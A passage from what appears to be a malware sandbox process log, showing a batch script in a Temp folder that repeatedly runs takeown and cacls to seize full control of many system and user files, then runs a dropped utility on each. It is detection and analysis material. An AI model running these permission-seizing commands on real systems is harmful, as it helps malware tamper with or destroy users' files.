- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3164
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:4656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    PID:3744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2564
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2512
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:6084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:5048
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:316
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:5028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:3420
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      PID:2980
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin""
  2⤵
  PID:2032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin" /E /G Admin:F /C
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000006F.bin" -nobanner
    3⤵
    PID:4452
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000006F.bin" -nobanner
      4⤵
      PID:1760
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin""
  2⤵
  PID:5560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin" /E /G Admin:F /C
    3⤵
    PID:6592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin"
    3⤵
    - Modifies file permissions
    PID:5360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000006P.bin" -nobanner
    3⤵
    PID:7020
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000006P.bin" -nobanner
      4⤵
      PID:6500
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin""
  2⤵
  PID:7756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin" /E /G Admin:F /C
    3⤵
    PID:5380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin"
    3⤵
    - Modifies file permissions
    PID:7284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000073.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7252
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000073.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:6472
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin""
  2⤵
  PID:7964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin" /E /G Admin:F /C
    3⤵
    PID:7844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin"
    3⤵
    - Modifies file permissions
    PID:7452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000081.bin" -nobanner
    3⤵
    PID:8152
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000081.bin" -nobanner
      4⤵
      PID:1792
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin""
  2⤵
  PID:7856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin" /E /G Admin:F /C
    3⤵
    PID:7476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin"
    3⤵
    - Modifies file permissions
    PID:6416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000009D.bin" -nobanner
    3⤵
    PID:5344
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000009D.bin" -nobanner
      4⤵
      PID:6548
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin""
  2⤵
  PID:6284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin"
    3⤵
    PID:3804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000AJ.bin" -nobanner
    3⤵
    PID:5692
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000AJ.bin" -nobanner
      4⤵
      PID:3556
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin"
    3⤵
    - Modifies file permissions
    PID:5680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000AV.bin" -nobanner
    3⤵
    PID:6604
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000AV.bin" -nobanner
      4⤵
      PID:6540
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:7328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    PID:7564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:7016
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:7096
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:7036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    PID:7388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4564
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:7688
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui""
  2⤵
  PID:6768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:6384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui"
    3⤵
    PID:6840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:6336
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:6588
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin""
  2⤵
  PID:7556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin" /E /G Admin:F /C
    3⤵
    PID:5760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin"
    3⤵
    - Modifies file permissions
    PID:2368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000C.bin" -nobanner
    3⤵
    PID:5088
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000C.bin" -nobanner
      4⤵
      PID:7648
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.e43d970d-bb6b-4fb6-a53e-400d9698b1d4.1.etl""
  2⤵
  PID:7220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.e43d970d-bb6b-4fb6-a53e-400d9698b1d4.1.etl" /E /G Admin:F /C
    3⤵
    PID:7504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.e43d970d-bb6b-4fb6-a53e-400d9698b1d4.1.etl"
    3⤵
    - Modifies file permissions
    PID:3564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "NotificationUxBroker.e43d970d-bb6b-4fb6-a53e-400d9698b1d4.1.etl" -nobanner
    3⤵
    PID:7676
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "NotificationUxBroker.e43d970d-bb6b-4fb6-a53e-400d9698b1d4.1.etl" -nobanner
      4⤵
      PID:7700
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:284
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin""
  2⤵
  PID:7568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin" /E /G Admin:F /C
    3⤵
    PID:5300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin"
    3⤵
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000O.bin" -nobanner
    3⤵
    PID:7828
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000O.bin" -nobanner
      4⤵
      PID:5068
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin""
  2⤵
  PID:6296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin" /E /G Admin:F /C
    3⤵
    PID:8096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin"
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000012.bin" -nobanner
    3⤵
    PID:972
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000012.bin" -nobanner
      4⤵
      PID:6036
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin""
  2⤵
  PID:7780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin"
    3⤵
    - Modifies file permissions
    PID:5976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000056.bin" -nobanner
    3⤵
    PID:5996
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000056.bin" -nobanner
      4⤵
      PID:5148
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5412
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm""
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm" /E /G Admin:F /C
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm"
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ActivitiesCache.db-shm" -nobanner
    3⤵
    PID:5784
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ActivitiesCache.db-shm" -nobanner
      4⤵
      PID:5204
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin""
  2⤵
  PID:1396
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin" /E /G Admin:F /C
    3⤵
    PID:5836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin"
    3⤵
    PID:6556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000072.bin" -nobanner
    3⤵
    PID:5480
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000072.bin" -nobanner
      4⤵
      PID:7904
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin""
  2⤵
  PID:5420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin" /E /G Admin:F /C
    3⤵
    PID:3756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin"
    3⤵
    - Modifies file permissions
    PID:6680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000007C.bin" -nobanner
    3⤵
    PID:5752
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000007C.bin" -nobanner
      4⤵
      PID:5808
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin""
  2⤵
  PID:7416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin" /E /G Admin:F /C
    3⤵
    PID:5904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin"
    3⤵
    - Modifies file permissions
    PID:7048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000007M.bin" -nobanner
    3⤵
    PID:5800
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000007M.bin" -nobanner
      4⤵
      PID:5788
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin""
  2⤵
  PID:5648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin" /E /G Admin:F /C
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin"
    3⤵
    - Modifies file permissions
    PID:6096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000008L.bin" -nobanner
    3⤵
    PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000008L.bin" -nobanner
      4⤵
      PID:5452
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3164
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin""
  2⤵
  PID:6952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin" /E /G Admin:F /C
    3⤵
    PID:5016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin"
    3⤵
    PID:6412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000091.bin" -nobanner
    3⤵
    PID:2564
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000091.bin" -nobanner
      4⤵
      PID:4488
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin""
  2⤵
  PID:4632
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin" /E /G Admin:F /C
    3⤵
    PID:6056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin"
    3⤵
    - Modifies file permissions
    PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000009M.bin" -nobanner
    3⤵
    PID:5048
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000009M.bin" -nobanner
      4⤵
      PID:840
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6612
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin""
  2⤵
  PID:3256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin" /E /G Admin:F /C
    3⤵
    PID:6400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin"
    3⤵
    - Modifies file permissions
    PID:3420
- - C:\Windows\SysWOW64\cmd.exe
